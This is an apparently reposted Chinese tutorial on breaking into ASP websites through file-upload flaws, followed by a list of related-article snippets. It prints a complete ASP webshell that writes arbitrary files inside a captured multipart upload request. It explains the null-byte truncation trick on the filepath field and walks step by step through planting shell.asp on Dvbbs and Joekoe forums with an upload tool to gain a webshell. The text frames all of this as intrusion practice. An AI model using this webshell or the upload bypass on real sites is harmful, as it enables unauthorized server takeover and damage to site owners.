实例分析ASP上传漏洞入侵实战及扩展

【上传漏洞欺骗技术】

  网络上许多程序都有着上传漏洞,比如任我飞扬整站程序、动感购物商城、秋叶商城、惠信新闻系统等。本文主要讲解上传漏洞的入侵实战以及一些扩展利用。首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来如下:

  POST /bbs/upfile.asp HTTP/1.1

  ……. 省略了N多没用信息

Content-Length: 1792
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN
-----------------------------7d52191850242
Content-Disposition: form-data; name="filepath"

uploadFace
-----------------------------7d52191850242
Content-Disposition: form-data; name="act"

upload
-----------------------------7d52191850242
Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"
Content-Type: text/plain

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red><h2>成功!</h2><font>" %>
<% else %>
<% response.write "<font color=red><h1>失败!</h1></font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='''' method=post>" %>
<% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "地址来自" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "你的留言:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=sky!!>" %>
<% Response.write "</form>" %>

-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d52191850242--

  传递的信息我们获取了,下面就来修改下达到欺骗目的。主要修改一下几点:

  1.Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"

  2.Content-Disposition: form-data; name="fname"

  E:\木马\asp\shell.asp

  3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我们修改成uploadFace\shell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为''\0''这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。

  4.还有一个地方也要修改,就是这句Content-Length: 1792表示提交数据的字符个数。

  如果你修改了filepath的值那么这个长度1792也要变换,一个字母或者数字的长度就是1,不要忘记最后面那个空格那个也算1。

  【上传漏洞实战】

  我们就先用漏洞的鼻祖动网论坛来实战下。从原理可以看到上传的时侯还要修改数据,还要截包,所以网上出现了许多的工具。现在我们直接用老兵的上传工具来把复杂的步骤变简单,只要修改几个数据就可以。我们来看下这个工具的界面,如下图1:

screen.width-333)this.width=screen.width-333" border=0>

图1 老兵上传工具界面

  我们来说下工具的用法:

  Action中输入存在上传漏洞文件的URL: http://target.net/bbs/UpFile.asp;UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号后面填的是上传到对方服务器上的后门的名称/shell.asp;输入一个WEB程序允许上传的类型文本框中默认JPG就可以了(一般网站都允许上传JPG图片文件);File里第一个文本框中的File1即是表单中的File1,等号后面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记住最好是你在系统中注册后的Cookies值。

  这里以我们入侵动网论坛为例,这里Action:填入http://www.***.com/bbs/upfile.asp;UpPath第一个文本框填入:filepath;第二个填入:/shell.asp(你也可以写/bbs/shell.asp这样上传成功后就传到/bbs 目录下了!)输入一个WEB程序允许上传的类型文本框中默认JPG就好了;File第一个文本框输入:file1;第二个填入:E:\木马\asp\shell.asp (这个ASP木马是在自己机器上的路径,点后面的文件打开图标浏览找到ASP木马即可。)

  Cookies:这里不用抓包了,因为这里的上传根本不检测Cookie的哦。没有它会报错的如果都填写好了直接按“Submit”按键提交!

screen.width-333)this.width=screen.width-333" border=0>

图2上传成功提示

  当点击Submit按钮后,最好用浏览器自己访问下,程序也会有误报的。我们用浏览器来访问下。

screen.width-333)this.width=screen.width-333" border=0>

图3可以看到已经上传成功了

  下一步就是写入一个功能强大的木马来操作了,不再深入。

  【上传漏洞实战扩展】

  并不仅仅只有动网有上传漏洞,在网络上许许多多的程序都有这个漏洞,上传漏洞的原理一样,掌握之后即可自由发挥,具体视程序代码而定。下面我们以乔客论坛为例为大家扩展一下上传漏洞的应用。
首先注册一个正常用户并且登录,然后找到上传页面地址:http://192.168.1.3/3/upload.asp?uppath=forum&upname=&uptext=jk_word查看源码如下:
--------------------------------------------------------------------------------

<FORM name=form1 action=?action=upfile method=post encType=multipart/form-data>
<INPUT type=hidden value=forum name=up_path>
<INPUT type=hidden value=200593075710 name=up_name>
<INPUT type=hidden value=jk_word name=up_text> 
<INPUT type=file size=40 name=file_name1>
<INPUT type=submit value=点击上传 name=submit>

--------------------------------------------------------------------------------

  看到源代码后,就应该知道老兵上传工具里边我们该怎么填写了。
Action中输入:http://192.168.1.3/3/upload.asp?action=upfile UpPath第一个文本框中输入:up_name;第二个中输入上传后的SHELL名称shell.asp;File 第一个文本框中输入file_name1,第二个是本机的木马文件。COOKIES这里填写抓包得到的COOKIES值,注意一定要填写用WsockExpert抓取的Cookies信息,其主要功能是用来验证!如图:

screen.width-333)this.width=screen.width-333" border=0>

图4设置如图

  都设置好后点击Submit按钮,看到上传成功了,打开浏览器访问一下看是否成功,如图

screen.width-333)this.width=screen.width-333" border=0>

图5上传成功

  至此已经成功的拿到webshell,就是这么简单,重要的是我们的思路要灵活,也要善于发现一个系统是否存在上传漏洞。当然至于拿到webshell后你能做什么,就看服务器的安全配置以及你的个人水平了哦,这里不做讨论。

(0)

相关推荐

  • 实例分析ASP上传漏洞入侵实战及扩展

    实例分析ASP上传漏洞入侵实战及扩展

    [上传漏洞欺骗技术] 网络上许多程序都有着上传漏洞,比如任我飞扬整站程序.动感购物商城.秋叶商城.惠信新闻系统等.本文主要讲解上传漏洞的入侵实战以及一些扩展利用.首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据.一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来如下: POST /bbs/upfile.asp HTTP/1.1 --. 省略了N多没用信息 Content-Length: 1

  • ASP上传漏洞之利用CHR(0)绕过扩展名检测脚本

    今天Demon 提到了这个问题,正好想到之前看到的一篇文章<Automatic file upload using IE+ADO without user interaction - VBSscript> .这篇文章给出了本地无交互自动上传脚本的示例,正好今天可以借来一用,原脚本利用了InternetExplorer.Application组件,我改写了一下,用WinHttp.WinHttpRequest.5.1实现了类似的功能,关于这个组件更多的用法请参考<WinHttpRequest

  • 解决ASP(图像)上传漏洞的方法

    经常听说的ASP上传漏洞,即是将一些木马文件修改后缀名(修改为图像文件后缀),进行上传. 针对此情况使用下列函数进行辨别: 复制代码 代码如下: <% '****************************************************************** 'CheckFileType 函数用来检查文件是否为图片文件 '参数filename是本地文件的路径 '如果是文件jpeg,gif,bmp,png图片中的一种,函数返回true,否则返回false '******

  • asp 之上传漏洞终结篇

    收藏关于上传漏洞的文章,最近一直遇到这个麻烦, 作者:szjwwwww   出自:黑鹰基地论坛 http://www.3800cc.com 一.写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat) 用于提交 数据包 DOS界面下运行:    NC -vv www.***.com 80<1.txt    -vv: 回显    80:  www端口    1.txt: 就是你要发送的数据包   (更多使用方法请查看本区的帖子)  WSE(WS

  • 文件上传漏洞在惠信中的应用

    近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧! 惠信新闻系统3.1 windows2000+sp4 先看这句代码.admin_uploadfilesave.asp ............... Server.mappath(formPath&file.FileName) ............................ 保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定

  • php安全攻防利用文件上传漏洞与绕过技巧详解

    目录 前言 文件上传漏洞的一些场景 场景一:前端js代码白名单判断.jpg|.png|.gif后缀 场景二:后端PHP代码检查Content-type字段 场景三:代码黑名单判断.asp|.aspx|.php|.jsp后缀 场景四:代码扩大黑名单判断 绕过方式--htaccsess: 绕过方式--大小写绕过: 场景五:一些复合判断 空格.点绕过(windows) ::$DATA绕过(windows) 双写绕过 %00截断 %0a绕过 图片马绕过 二次渲染绕过 条件竞争 /.绕过 前言 文件上传漏

  • 通过PHP简单实例介绍文件上传

    php文件上传的简单例子,获取文件名称.类型.大小等相关信息,完成文件的上传,供大家学习参考. 1.上传文件的代码: code <?php //判断临时文件存放路径是否包含用户上传的文件 if(is_uploaded_file($_FILES["uploadfile"]["tmp_name"])){ //为了更高效,将信息存放在变量中 $upfile=$_FILES["uploadfile"];//用一个数组类型的字符串存放上传文件的信息

  • Javascript & DHTML 实例编程(教程)(三)初级实例篇1—上传文件控件实例

    Javascript & DHTML 实例编程(教程)(三)初级实例篇1—上传文件控件实例

    效果DEMO:http://www.never-online.net/tutorial/js/upload/Javascript & DHTML 实例编程(教程)(三),初级实例篇-上传文件控件实例上章基本上把要交代的基本知识都说了一些,今天终于开始写代码了:D首先来做一个实例,批量上传的UI控件.以后一般做的示例也是以UI控件为主的.都是封装成Object或者用Function封装成"Class"类. 也许对于单单看前几章的朋友来说这个例子过于深奥了,但是不用担心,一步步来解

  • Java Servlet简单实例分享(文件上传下载demo)

    项目结构 src com servletdemo DownloadServlet.java ShowServlet.java UploadServlet.java WebContent jsp servlet download.html fileupload.jsp input.jsp WEB-INF lib commons-fileupload-1.3.1.jar commons-io-2.4.jar 1.简单实例 ShowServlet.java package com.servletdem

  • 关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

    关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

    背景 CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞.该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可. 影响版本 vmware:esxi:7.0/6.7/6.5 vmware:vcenter_server:7.0/6.7/6.5 漏洞复现 fofa查询 语法:title="+ ID_VC_Welcome +" POC https://x.x.x.x/ui/vropspluginui/rest/ser

随机推荐